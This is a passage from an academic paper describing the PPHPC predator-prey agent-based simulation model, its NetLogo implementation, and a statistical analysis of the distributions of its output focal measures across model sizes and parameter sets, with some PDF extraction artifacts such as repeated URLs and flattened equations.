1,2,...Environment Restart cr 1,2,... Entities, state variables, scales The PPHPC model is composed of three entity classes: agents, grid cells and environment. Each of these entity classes is defined by a set of state variables, as shown in Table 1. All state variables explicitly assume integer values to avoid issues with the handling of floating-point arithmetic on different programming languages and/or processor architectures. The t state variable defines the agent type, either s (sheep, i.e. prey) or w (wolf, i.e. predator). The only behavioral difference between the two types is in the feeding pattern: while prey consume passive cell-bound food, predators consume prey. Other than that, prey and predators may have different values for other state variables, as denoted by the superscripts s and w. Agents have an energy state variable, E, which increases by gs or gw when feeding, decreases by ls or lw when moving, and decreases by half when reproducing. When energy reaches zero, the agent is removed from the simulation. Agents with energy higher than rsT or r w T may reproduce with probability given by r s P or r w P . The grid position state variables, X and Y , indicate which cell the agent is located in. There is no conceptual limit on the number of agents that can exist during the course of a simulation run. Instances of the grid cell entity class can be thought of the place or neighborhood where agents act, namely where they try to feed and reproduce. Agents can only interact with other agents and resources located in the same grid cell. Grid cells have a fixed grid position, (x,y), and contain only one resource, cell-bound food (grass), which can be consumed by prey, and is represented by the countdown state variable C. The C state variable specifies the number of iterations left for the cell-bound food to become available. Food becomes available when C = 0, and when a prey consumes it, C is set to cr . The set of all grid cells forms the environment entity, a toroidal square grid where the simulation takes place. The environment is defined by its size, (xenv,yenv), and by the restart parameter, cr . Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 5/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 Spatial extent is represented by the aforementioned square grid, of size (xenv,yenv), where xenv and yenv are positive integers. Temporal extent is represented by a positive integer m, which represents the number of discrete simulation steps or iterations. Spatial and temporal scales are merely virtual, i.e. they do not represent any real measure. Process overview and scheduling Algorithm 1 describes the simulation schedule and its associated processes. Execution starts with an initialization process, Init(), where a predetermined number of agents are randomly placed in the simulation environment. Cell-bound food is also initialized at this stage. After initialization, and to get the simulation state at iteration zero, outputs are gathered by the GetStats() process. The scheduler then enters the main simulation loop, where each iteration is sub-divided into four steps: (1) agent movement ; (2) food growth in grid cells; (3) agent actions ; and, (4) gathering of simulation outputs. State variables Algorithm 1 Main simulation algorithm. for loops can be processed in any order or in random order. In terms of expected dynamic behavior, the former means the order is not relevant, while the latter specifies loop iterations should be explicitly shuffled. 1: I() 2: GS() 3: i ← 1 4: for i <= m do 5: for each agent do ◃ Any order 6: M() 7: end for 8: for each grid cell do ◃ Any order 9: GF() 10: end for 11: for each agent do ◃ Random order 12: A() 13: end for 14: GS() 15: i ← i+1 16: end for are asynchronously updated, i.e. they are assigned a new value as soon as this value is calculated by a process (e.g., when an agent gains energy by feeding). Design concepts Basic principles. The general concepts of this model are based on well studied predator- prey dynamics, initially through analytical approaches (Lotka, 1925; Volterra, 1926), and later using agent-based models (Smith, 1991). However, PPHPC is designed so that it can be correctly implemented using diverse computational approaches. Realizations of this Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 6/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 model can provide valuable information on how to better implement SABMs on different computing architectures, namely parallel ones. In particular, they may shown the impact of different parallelization strategies on simulation performance. Emergence. The model is characterized by oscillations in the population of both prey and predator, as well as in the available quantity of cell-bound food. Typically, a peak of predator population occurs slightly after a peak in prey population size, while quantity of cell-bound food is approximately in “phase opposition” with the prey’s population size. Sensing. Agents can sense the presence of food in the grid cell in which they are currently located. This means different thing for prey and predators. Prey agents can read the local grid cell C state variable, which if zero, means there is food available. Predator agents can determine the presence of prey agents. Interaction. Agents interact with sources of food present in the grid cell they are located in. Stochasticity. The following processes are random: (a) initialization of specific state variables; (b) agent movement; (c) the order in which agents act; and, (d) agent reproduction. Observation. The following vector is collected in the GetStats() process, where i refers to the current iteration: Oi = (P s i ,P w i ,P c i ,E s i ,E w i ,Ci) Psi and P w i refer to the total prey and predator population counts, respectively, while P c i holds the quantity of available cell-bound food. E s i and E w i contain the mean energy of prey and predator populations. Finally, Ci refers to the mean value of the C state variable in all grid cells. Initialization The initialization process begins by instantiating the environment entity, a toroidal square grid, and filling it with xenv × yenv grid cells. The initial value of the countdown state variable in each grid cell, C0, is set according to Eq. (1), C0 =  U(1,cr), if c0 = 0 0, if c0 = 1, with c0 = U(0,1). (1) In other words, cell-bound food is initially available with 50% probability. If not available, the countdown state variable is set to a random value between 1 and cr . The initial value of the state variables for each agent is determined according to Eqs. (2) and (3). E0 = U(1,2g), with g ∈{g s ,gw} (2) (X0,Y0) =  U(0,xenv −1),U(0,yenv −1)  . (3) Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 7/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 Submodels As stated in Process overview and scheduling, each iteration of the main simulation loop is sub-divided into four steps, described in the following paragraphs. Move(). In step 1, agents Move(), in any order, within a Von Neumann neighborhood, i.e. up, down, left, right or stay in the same cell, with equal probability. Agents lose ls or lw units of energy when they move, even if they stay in the same cell; if energy reaches zero, the agent dies and is removed from the simulation. GrowFood(). In step 2, during the GrowFood() process, each grid cell checks if C = 0 (meaning there is food available). If C > 0 it is decremented by one unit. Equation (4) summarizes this process. Ci = max(Ci−1 −1,0). (4) Act(). In step 3, agents Act() in explicitly random order, i.e. the agent list should be shuffled before the agents have a chance to act. The Act() process is composed of two sub-actions: TryEat() and TryReproduce(). The Act() process is atomic, i.e. once called, both TryEat() and TryReproduce() must be performed; this implies that prey agents may be killed by predators before or after they have a chance of calling Act(), but not during the call. TryEat(). Agents can only interact with sources of food present in the grid cell they are located in. Predator agents can kill and consume prey agents, removing them from the simulation. Prey agents can consume cell-bound food, resetting the local grid cell C state variable to cr . A predator can consume one prey per iteration, and a prey can only be con- sumed by one predator. Agents who act first claim the food resources available in the local grid cell. Feeding is automatic: if the resource is there and no other agent has yet claimed it, the agent will consume it. Moreover, only one prey can consume the local cell-bound food if available (i.e. if C = 0). When an agent successfully feeds, its energy E is incremented by gs or gw, depending on whether the agent is a prey or a predator, respectively. TryReproduce(). If the agent’s energy, E, is above its species reproduction threshold, rsT or r w T , then reproduction will occur with probability given by the species reproduction probability, rsP or r w P , as shown in Algorithm 2. When an agent successfully reproduces, its energy is divided (using integer division) with its offspring. The offspring is placed in the same grid cell as his parent, but can only take part in the simulation in the next iteration. More specifically, newly born agents cannot Act(), nor be acted upon. The latter implies that newly born prey cannot be consumed by predators in the current iteration. Agents immediately update their energy if they successfully feed and/or reproduce. Parameterization. Model parameters can be qualitatively separated into size-related and dynamics-related parameters, as shown in Table 2. Although size-related parameters also influence model dynamics, this separation is useful for parameterizing simulations. Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 8/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 Algorithm 2 Agent reproduction. function TR() if E > rT then if U(0,99) < rP then Echild ← E/2 ◃ Integer division E ← E−Echild NA(t,Echild,X,Y ) end if end if end function Table 2 Size-related and dynamics-related model parameters. Type Parameter Symbol Environment size xenv,yenv Initial agent count Ps0,P w 0 Size Number of iterations m Energy gain from food gs, gw Energy loss per turn ls, lw Reproduction threshold rsT , r w T Reproduction probability rsP , r w P Dynamics Cell food restart cr Table 3 A selection of initial model sizes. Size xenv × yenv P s 0 P w 0 100 100 × 100 400 200 200 200 × 200 1,600 800 400 400 × 400 6,400 3,200 800 800 × 800 25,600 12,800 1,600 1,600 × 1,600 102,400 51,200 . . . . . . . . . . . . Concerning size-related parameters, more specifically, the grid size, we propose a base value of 100×100, associated with 400 prey and 200 predators. Different grid sizes should have proportionally assigned agent population sizes, as shown in Table 3. In other words, there are no changes in the agent density nor the ratio between prey and predators. For the dynamics-related parameters, we propose two sets of parameters, Table 4, which generate two distinct dynamics. The second parameter set typically yields more than twice the number of agents than the first parameter set. Matching results with runs based on dis- tinct parameters is necessary in order to have a high degree of confidence in the similarity of different implementations (Edmonds & Hales, 2003). While many more combinations Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 9/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 Table 4 Dynamics-related parameter sets. Parameter Symbol Set 1 Set 2 Prey energy gain from food gs 4 30 Prey energy loss p/turn ls 1 1 Prey reprod. threshold rsT 2 2 Prey reprod. probability rsP 4 10 Predator energy gain from food gw 20 10 Predator energy loss p/turn lw 1 1 Predator reprod. threshold rwT 2 2 Predator reprod. probability rwP 5 5 Cell food restart cr 10 15 of parameters can be experimented with this model, these two sets are the basis for testing and comparing PPHPC implementations. We will refer to a combination of model size and parameter set as “size@set,” e.g., 400@1 for model size 400, parameter set 1. While simulations of the PPHPC model are essentially non-terminating,1 the number 1 A non-terminating simulation is one for which there is no natural event to specify the length of a run (Law, 2015). of iterations, m, is set to 4,000, as it allows to analyze steady-state behavior for all the parameter combinations discussed here. A NetLogo implementation NetLogo is a well-documented programming language and modeling environment for ABMs, focused on both research and education. It is written in Scala and Java and runs on the Java Virtual Machine (JVM). It uses a hybrid interpreter and compiler that partially compiles ABM code to JVM bytecode (Sondahl, Tisue & Wilensky, 2006). It comes with powerful built-in procedures and is relatively easy to learn, making ABMs more accessible to researchers without programming experience (Martin et al., 2012). Advantages of having a NetLogo version include real-time visualization of simulation, pseudo-code like model descriptions, simplicity in changing and testing different model aspects and parameters, and command-line access for batch runs and cycling through different parameter sets, even allowing for multithreaded simultaneous execution of multiple runs. A NetLogo reference implementation is also particularly important as a point of comparison with other ABM platforms (Isaac, 2011). The NetLogo implementation of PPHPC, Fig. 1, is based on NetLogo’s own Wolf Sheep Predation model (Wilensky, 1997), considerably modified to follow the ODD discussed in the previous section. Most NetLogo models will have at least a setup procedure, to set up the initial state of the simulation, and a go procedure to make the model run continuously (Wilensky, 2014). The Init() and GetStats() processes (lines 1 and 2 of algorithm 1) are defined in the setup procedure, while the main simulation loop is implemented in the go procedure. The latter has an almost one-to-one relation with its pseudo-code counterpart in Algorithm 1. By default, NetLogo shuffles agents before issuing them orders, which fits naturally into the model ODD. The implementation is available at https://github.com/ fakenmc/pphpc/tree/netlogo. Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 10/27 https://peerj.com/computer-science/ https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo https://github.com/fakenmc/pphpc/tree/netlogo http://dx.doi.org/10.7717/peerj-cs.36 Figure 1 NetLogo implementation of the PPHPC model. Selection of focal measures In order to analyze the output of a simulation model from a statistical point-of-view, we should first select a set of focal measures (FMs) which summarize each output. Wilensky & Rand (2007) use this approach in the context of statistical comparison of replicated models. Typically, FMs consist of long-term or steady-state means. However, being limited to analyze average system behavior can lead to incorrect conclusions (Law, 2015). Consequently, other measures such as proportions or extreme values can be used to assess model behavior. In any case, the selection of FMs is an empirical exercise and is always dependent of the model under study. A few initial runs are usually required in order to perform this selection. For the PPHPC model, the typical output of a simulation run is shown in Fig. 2 for size 400 and both parameter sets. In both cases, all outputs undergo a transient stage and tend to stabilize after a certain number of iterations, entering steady-state. For other sizes, the situation is similar apart from a vertical scaling factor. Outputs display pronounced extreme values in the transient stage, while circling around a long-term mean and approximately constant standard deviation in the steady-state phase. This standard deviation is an important feature of the outputs, as it marks the overall variability of the predator-prey cycles. Having this under consideration, six statistics, described in Table 5, were selected for each output. Considering there are six outputs, a total of 36 FMs are analyzed for the PPHPC model. Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 11/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 Figure 2 Typical model output for model size 400. Other model sizes have outputs which are similar, apart from a vertical scaling factor. Pi refers to total population, Ei to mean energy and Ci to mean value of the countdown state variable, C. Superscript s relates to prey, w to predators, and c to cell-bound food. Pci and Ci are scaled for presentation purposes. (A) Population, param. set 1. (B) Energy, param. set 1. (C) Population, param. set 2. (D) Energy, param. set 2. Table 5 Statistical summaries for each output X. Xi is the value of X at iteration i, m denotes the last iteration, and l corresponds to the iteration separating the transient and steady-state stages. Statistic Description max0≤i≤m Xi Maximum value. arg max0≤i≤mXi Iteration where maximum value occurs. min0≤i≤m Xi Minimum value. arg min0≤i≤mXi Iteration where minimum value occurs. X ss = m i=l+1 Xi/(m− l) Steady-state mean. Sss =  m i=l+1(Xi−Xss) 2 m−l−1 Steady-state sample standard deviation. Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 12/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 Table 6 Values of a generic simulation output (under ‘Iterations’) for n replications of m iterations each (plus iteration 0, i.e. the initial state), and the respective FMs (under ‘Focal measures’). Values along columns are IID. Rep. Iterations Focal measures 1 X10 X11 ... X1,m−1 X1,m maxX1 arg maxX1 minX1 arg minX1 X ss 1 S ss 1 2 X20 X21 ... X2,m−1 X2,m maxX2 arg maxX2 minX2 arg minX2 X ss 2 S ss 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . n Xn0 Xn1 ... Xn,m−1 Xn,m maxXn arg maxXn minXn arg minXn X ss n S ss n Collecting and preparing data for statistical analysis Let Xj0,Xj1,Xj2,...,Xjm be an output from the j th simulation run (rows under ‘Iterations’ in Table 6). The Xji’s are random variables that will, in general, be neither independent nor identically distributed (Law, 2015), and as such, are not adequate to be used directly in many formulas from classical statistics (which are discussed in the next section). On the other hand, let X1i,X2i,...,Xni be the observations of an output at iteration i for n runs (columns under ‘Iterations’ in Table 6), where each run begins with the same initial conditions but uses a different stream of random numbers as a source of stochasticity. The Xji’s will now be independent and identically distributed (IID) random variables, to which classical statistical analysis can be applied. However, individual values of the output X at some iteration i are not representative of X as a whole. Thus, we use the selected FMs as representative summaries of an output, as shown in Table 6, under ‘Focal measures.’ Taken column-wise, the observations of the FMs are IID (because they are obtained from IID replications), constituting a sample prone to statistical analysis. Regarding steady-state measures, X ss and Sss, care must be taken with initialization bias, which may cause substantial overestimation or underestimation of the long-term performance (Sanchez, 1999). Such problems can be avoided by discarding data obtained during the initial transient period, before the system reaches steady-state conditions. The simplest way of achieving this is to use a fixed truncation point, l, for all runs with the same initial conditions, selected such that: (a) it systematically occurs after the transient state; and, (b) it is associated with a round and clear value, which is easier to communicate (Sanchez, 1999). Law (2015) suggests the use of Welch’s procedure (Welch, 1981) in order to empirically determine l. Let X0, X1, X2, ..., Xm be the averaged process taken column-wise from Table 6 (columns under ‘Iterations’), such that Xi = n j=1 Xji/n for i=0,1,...,m. The averaged process has the same transient mean curve as the original process, but its variance is reduced by a factor of n. A low-pass filter can be used to remove short-term fluctuations, leaving the long-term trend of interest, allowing us to visually determine a value of l for which the averaged process seems to have converged. A moving average approach can be used for filtering: Xi(w) =   w s=−w Xi+s 2w+1 if i = w+1,...,m−wi−1 s=−(i−1) Xi+s 2i−1 if i = 1,...,w (5) Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 13/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 where w, the window, is a positive integer such that w 6 ⌊m/4⌋. This value should be large enough such that the plot of Xi(w) is moderately smooth, but not any larger. A more in-depth discussion of this procedure is available in Welch (1981) and Law (2015). Statistical analysis of focal measures Let Y1,Y2,...,Yn be IID observations of some FM with finite population mean µ and finite population variance σ 2 (i.e. any column under ‘Focal measures’ in Table 6). Then, as described by Law (2007) and Law (2015), unbiased point estimators for µ and σ 2 are given by Y (n) = n j=1 Yj n (6) and S2(n) = n j=1[Yj −Y (n)] 2 n−1 (7) respectively. Another common statistic usually determined for a given FM is the confidence interval (CI) for Y (n), which can be defined in several different ways. The t-distribution CI is commonly used for this purpose (Law, 2007; Law, 2015), although it has best coverage for normally distributed samples, which is often not the case for simulation models in general (Sargent, 1976; Law, 2015) and agent-based models in particular (Helbing & Balietti, 2012). If samples are drawn from populations with multimodal, discrete or strongly skewed distributions, the usefulness of t-distribution CIs is further reduced. While there is not much to do in the case of multimodal distributions, Law (2015) proposes the use of the CI developed by Willink (2005), which takes distribution skewness into account. Furthermore, CIs for discrete distributions are less studied and usually assume data follows a binomial distribution, presenting some issues of its own (Brown, Cai & DasGupta, 2001). As suggested by Radax & Rengs (2010), we focus on providing a detailed assessment of the distributional properties of the different FMs, namely whether they are sufficiently “normal” such that normality-assuming (parametric) statistical techniques can be applied, not only for CI estimation, but also for model comparison purposes. The normality of a data set can be assessed graphically or numerically (Park, 2008). The former approach is intuitive, lending itself to empirical interpretation by providing a way to visualize how random variables are distributed. The latter approach is a more objective and quantitative form of assessing normality, providing summary statistics and/or statistics tests of normality. In both approaches, specific methods can be either descriptive or theory-driven, as shown in Table 7. For this study we chose one method of each type, as shown in boldface in Table 7. This approach not only provides a broad overview of the distribution under study, but is also important because no single method can provide a complete picture of the distribution. Under the graphical methods umbrella, a histogram shows the approximate dis- tribution of a data set, and is built by dividing the range of values into a sequence of Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 14/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 Table 7 Methods for assessing the normality of a data set, adapted from Park (2008). Boldface methods are used in this study. Graphical methods Numerical methods Descriptive Histogram, Box plot, Dot plot Skewness, Kurtosis Theory-driven Q–Q plot, P-P plot Shapiro-Wilk, Anderson-Darling, Cramer-von Mises, Kolmogorov-Smirnov, Jarque-Bera and other tests intervals (bins), and counting how many values fall in each interval. A Q–Q plot compares the distribution of a data set with a specific theoretical distribution (e.g., the normal distribution) by plotting their quantiles against each other (thus “Q–Q”). If the two distributions match, the points on the plot will approximately lie on the y = x line. While a histogram gives an approximate idea of the overall distribution, the Q–Q plot is more adequate to see how well a theoretical distribution fits the data set. Concerning numerical methods, Skewness measures the degree of symmetry of a probability distribution about its mean, and is a commonly used metric in the analysis of simulation output data (Sargent, 1976; Nakayama, 2008; Law, 2015). If skewness is positive, the distribution is skewed to the right, and if negative, the distribution is skewed to the left. Symmetric distributions have zero skewness, however, the converse is not necessarily true, e.g., skewness will also be zero if both tails of an asymmetric distribution account for half the total area underneath the probability density function. In the case of theory-driven nu- merical approaches, we select the Shapiro-Wilk (SW) test (Shapiro & Wilk, 1965), as it has been shown to be more effective when compared to several other normality tests (Razali & Wah, 2011). We focus on the p-value of this test (instead of the test’s own W statistic), as it is an easily interpretable measure. The null-hypothesis of this test is that the data set, or sample, was obtained from a normally distributed population. If the p-value is greater than a predetermined significance level α, usually 0.01 or 0.05, then the null hypothesis cannot be rejected. Conversely, a p-value less than α implies the rejection of the null hypothesis, i.e., that the sample was not obtained from a normally distributed population. RESULTS A total of 30 replications, r = 1,...,30, were performed with NetLogo 5.1.0 for each combination of model sizes (Table 3) and parameters sets (Table 4). Each replication r was performed with a PRNG seed obtained by taking the MD5 checksum of r and converting the resulting hexadecimal string to a 32-bit integer (the maximum precision accepted by NetLogo), guaranteeing some independence between seeds, and consequently, between replications. The list of seeds is provided in Table S1. Determining the steady-state truncation point Using Welch’s method, we smoothed the averaged outputs using a moving average filter with w = 10. Having experimented with other values, w = 10 seemed to be a good compromise between rough and overly smooth plots. Fig. 3 shows results for model size 400 and both parameter sets. Following the recommendations described in section Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 15/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36/supp-1 http://dx.doi.org/10.7717/peerj-cs.36/supp-1 http://dx.doi.org/10.7717/peerj-cs.36 Figure 3 Moving average of outputs for model size 400 with w = 10. Other model sizes produce similar results, apart from a vertical scaling factor. The dashed vertical line corresponds to iteration l after which the output is considered to be in steady-state. (A) Population moving average, param. set 1. (B) Energy moving average, param. set 1. (C) Population moving average, param. set 2. (D) Energy moving average, param. set 2. ‘Methodology’, we select the steady-state truncation point to be l = 1,000 for parameter set 1, and l = 2,000 for parameter set 2. These are round values which appear to occur after the transient stage. Other model sizes produce similar results, apart from a vertical scaling factor, which means that these values of l are also applicable in those cases. Analyzing the distributions of focal measures The six statistic summaries for each FM, namely mean, sample variance, p-value of the SW test, skewness, histogram and Q–Q plot, are shown in Tables S2.1–S2.10 for all model size and parameter set combinations. The number of bins in the histograms is set to the minimum between 10 (an appropriate value for a sample size of 30) and the number of unique values in the data set. Much of the information provided in Tables S2.1–S2.10, namely the p-value of the SW test, the skewness, and the Q–Q plots, is geared towards continuous distributions. Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 16/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36/supp-2 http://dx.doi.org/10.7717/peerj-cs.36/supp-2 http://dx.doi.org/10.7717/peerj-cs.36/supp-2 http://dx.doi.org/10.7717/peerj-cs.36/supp-2 http://dx.doi.org/10.7717/peerj-cs.36 Table 8 Histograms for the several size@set combinations of the arg maxPsi FM. Set Size 100 200 400 800 1,600 1 2 However, FMs taken from arg max and arg min operators only yield integer (discrete) values, which correspond to specific iterations. The same is true for max and min of population outputs, namely Psi , P w i , and P c i . This can be problematic for statistic summaries taken from integer-valued FMs with a small number of unique values. For example, the SW test will not be very informative in such cases, and cannot even be performed if all observations yield the same value (e.g., arg max of Pci for 800@1, Table S2.4). Nonetheless, distributional properties of a FM can dramatically change for different model size and parameter set combinations. For example, for parameter set 2, observations of the arg max of Pci span many different values for model size 200 (Table S2.7), while for size 1,600 (Table S2.10) they are limited to only three different values. Summary statistics appropriate for continuous distributions could be used in the former case, but do not provide overly useful information in the latter. In order to maintain a consistent approach, our discussion will continue mainly from a continuous distribution perspective, more specifically by analyzing how closely a given FM follows the normal distribution, though we superficially examine its discrete nature when relevant. Distribution of focal measures over the several size@set combinations In the next paragraphs we describe the distributional behavior of each FM, and when useful, repeat in a compact fashion some of the information provided in Tables S2.1–S2.10. maxPsi . The SW p-value is consistently above the 5% significance level, skewness is usually low and with an undefined trend, and the Q–Q plots mostly follow the y = x line. Although there are borderline cases, such as 800@1 and 1,600@2, the summary statistics show that the maximum prey population FM generally follows an approximately normal distribution. arg maxPsi . This FM follows an approximately normal distribution for smaller sizes of parameter set 1, but as model size grows larger, the discrete nature of the data clearly stands out. This behavior is more pronounced for parameter set 2 (which yields simulations inherently larger than parameter set 1), such that, for 1,600@2, all observations yield the same value (i.e., 70). Table 8 shows, using histograms, how the distribution qualitatively evolves over the several size@set combinations. minPsi . Two very different behaviors are observed for the two parameter sets. In the case of parameter set 1, this FM has a slightly negatively skewed distribution, with some p-values below the 0.05 significance threshold, but is otherwise not very far from normality Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 17/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36/supp-2 http://dx.doi.org/10.7717/peerj-cs.36/supp-2 http://dx.doi.org/10.7717/peerj-cs.36/supp-2 http://dx.doi.org/10.7717/peerj-cs.36/supp-2 http://dx.doi.org/10.7717/peerj-cs.36/supp-2 http://dx.doi.org/10.7717/peerj-cs.36 Table 9 Q–Q plots for the several size@set combinations of the arg maxPwi FM. Set Size 100 200 400 800 1,600 1 2 (this is quite visible in some histograms). However, for parameter set 2, the data is more concentrated on a single value, more so for larger sizes. Note that this single value is the initial number of prey, which means that, in most cases, the minimum number of prey never drops below its initial value. arg minPsi . This FM follows a similar pattern to the previous one, but more pronounced in terms of discreteness, namely for parameter set 1. For parameter set 2, sizes 100 and 200, the distribution is bimodal, with the minimum prey population occurring at iteration zero (i.e. initial state) or around iteration 200, while for larger sizes, the minimum always occurs at iteration zero. Psi ss . The prey population steady-state mean seems to generally follow a normal distribution, the only exception being 400@2, in which some departure from normality is observed, as denoted by a SW p-value below 0.05 and a few outliers in the Q–Q plot. Sss(Psi ). For most size@set combinations this FM does not present large departures from normality. However, skewness is always positive. maxPwi . This FM presents distributions which are either considerably skewed or relatively normal. The former tend to occur for smaller model sizes, while the latter for larger sizes, although this trend is not totally clear. The 800@2 sample is a notable case, as it closely follows a normal distribution, with a symmetric histogram, approximately linear Q–Q plot, and a SW p-value of 0.987. arg maxPwi . Interestingly, for parameter set 1, this FM seems to follow a uniform distribution. This is more or less visible in the histograms, but also in the Q–Q plots, because when we plot uniform data points against a theoretical normal distribution in a Q–Q plot we get the “stretched-S” pattern which is visible in this case (Table 9). For parameter set 2, the distribution seems to be more normal, or even binomial as the discreteness of the data starts to stand-out for larger model sizes; the only exception is for size 100, which presents a multimodal distribution. minPwi . The minimum predator population seems to follow an approximately normal distribution, albeit with a slight positive skewness, except for 800@1, which has negative skewness. Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 18/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 arg minPwi . This FM displays an approximately normal distribution. However, for larger simulations (i.e. mainly for parameter set 2) the discrete nature of the data becomes more apparent. Pwi ss . The steady-state mean of predator population apparently follows a normal distribution. This is confirmed by all summary statistics, such as the SW p-value, which is above 0.05 for all size@set combinations. Sss(Pwi ). Departure from normality is not large in most cases (200@2 and 800@2 are exceptions, although the former due to a single outlier), but the trend of positive skewness is again observed for this statistic. maxPci . The maximum available cell-bound food seems to have a normal distribution, although 400@2 has a few outliers which affect the result of the SW p-value (which, nonetheless, is above 0.05). arg maxPci . The behavior of this FM is again quite different between parameter sets. For the first parameter set, the discrete nature of the underlying distribution stands out, with no more than three unique values for size 100, down to a single value for larger sizes, always centered around the value 12 (i.e. the maximum available cell-bound food tends to occur at iteration 12). For the second parameter set, distribution is almost normal for sizes above 200, centered around iteration 218, although its discreteness shows for larger sizes, namely for size 1,600, which only presents three distinct values. For size 100, most values fall in iteration 346, although two outliers push the mean up to 369.5. minPci . This FM displays an apparently normal distribution for all model sizes and parameter sets, with the exception of 800@1, which has a few outliers at both tails of the distribution, bringing down the SW p-value barely above the 5% significance level. arg minPci . In this case, the trend is similar for both parameter sets, i.e. the distribution seems almost normal, but for larger sizes the underlying discreteness becomes apparent. This is quite clear for parameter set 2, as shown in Table 10, where the SW test p-value decreases as the discreteness becomes more visible in the histograms and Q–Q plots. Pci ss . For this FM there is not a significant departure from normality. The only exception is for 800@1, but only due to a single outlier. Sss(Pci ). Like in previous cases, the steady-state sample standard deviation does not stray too far from normality, but consistently shows a positive skewness. maxE s i . For sizes 100 and 200 of both parameter sets, the maximum of the mean prey energy presents a positively skewed, lognormal-like distribution. For larger sizes, distributions tend to be more normal-like. This trend is clear when analyzing how the p-value of the SW test and the skewness vary for the several size@set combinations, as shown in Table 11, namely for sizes 100 and 200, where the former is smaller while the absolute value of the latter is larger. Fachada et al. (2015), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.36 19/27 https://peerj.com/computer-science/ http://dx.doi.org/10.7717/peerj-cs.36 Table 10 Three statistical summaries for the several sizes of the arg minPci FM for parameter set 2. Row ‘SW’ contains the SW test p-values, while the corresponding histograms and Q–Q plots are in rows ‘Hist.’ and ‘Q–Q’, respectively. Set Size 100 200 400 800 1,600 SW 0.437 0.071 0.062 0.011 <0.001 Hist. Q–Q Table 11 p-values for the SW test (row ‘SW’) and skewness (row ‘Skew.’) for the several size@set combinations of the maxE s i FM. Set Stat. Size 100 200 400 800 1,600 SW 0.159 0.012 0.625 0.672 0.555 1 Skew. 0.679 0.961 0.521 −0.123 0.196 SW <0.001 0.038 0.515 0.702 0.337 2 Skew. 1.80 1.07 −0.327 −0.216 0.389 arg maxE s i . For parameter set 1, the distribution is approximately normal for smaller sizes, with the underlying discreteness becoming apparent for larger sizes, centering around iteration 49. For parameter set 2, the data set revolves around a limited set of unique values (centered at iteration 16), following a poisson-like distribution, except for size 100, which displays a bimodal behavior. minE s i . This FM seems to follow an approximately normal distribution. arg minE s i . In the case of parameter set 1, this FM has distributions with a single value: zero. This means that the minimum mean prey energy occurs at the initial state of the simulation. From there onwards, mean prey energy is always higher. The 